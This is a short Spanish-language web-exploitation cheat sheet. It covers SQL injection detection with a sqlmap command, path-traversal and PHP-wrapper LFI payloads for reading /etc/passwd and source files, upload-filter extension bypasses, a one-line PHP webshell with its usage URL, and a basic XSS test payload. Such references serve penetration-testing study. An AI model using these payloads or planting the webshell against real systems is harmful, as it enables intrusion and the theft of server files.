Appearance
🌐 Explotación Web
Ataques dirigidos a aplicaciones web, APIs y servicios HTTP.
💉 SQL Injection (SQLi)
Inyección de código SQL para manipular la base de datos.
Detección
- Añadir
'o"al final de parámetros URL o inputs. - Si ves errores de SQL, es vulnerable.
Herramientas
- SQLMap:bash
sqlmap -u "http://objetivo.com/item.php?id=1" --dbs
📁 Local File Inclusion (LFI)
Leer archivos del servidor a través de la web.
Payloads Comunes
../../../../etc/passwd../../../../windows/win.ini- PHP Wrapper (Base64): Para leer código fuente sin ejecutarlo.
php://filter/convert.base64-encode/resource=config.php
📤 File Upload (RCE)
Subir una shell (webshell) si el servidor no valida bien los archivos.
Bypass de Extensiones
- Si
shell.phpestá bloqueado, prueba:shell.php5,shell.phtml,shell.php.jpg
Webshells Simples
- PHP:
<?php system($_GET['cmd']); ?> - Uso:
http://objetivo.com/uploads/shell.php?cmd=whoami
❌ Cross-Site Scripting (XSS)
Ejecutar JavaScript en el navegador de la víctima.
- Reflejado: El script viaja en la URL.
- Almacenado: El script se guarda en la BD (comentarios, foros).
- Payload de prueba:
<script>alert(1)</script>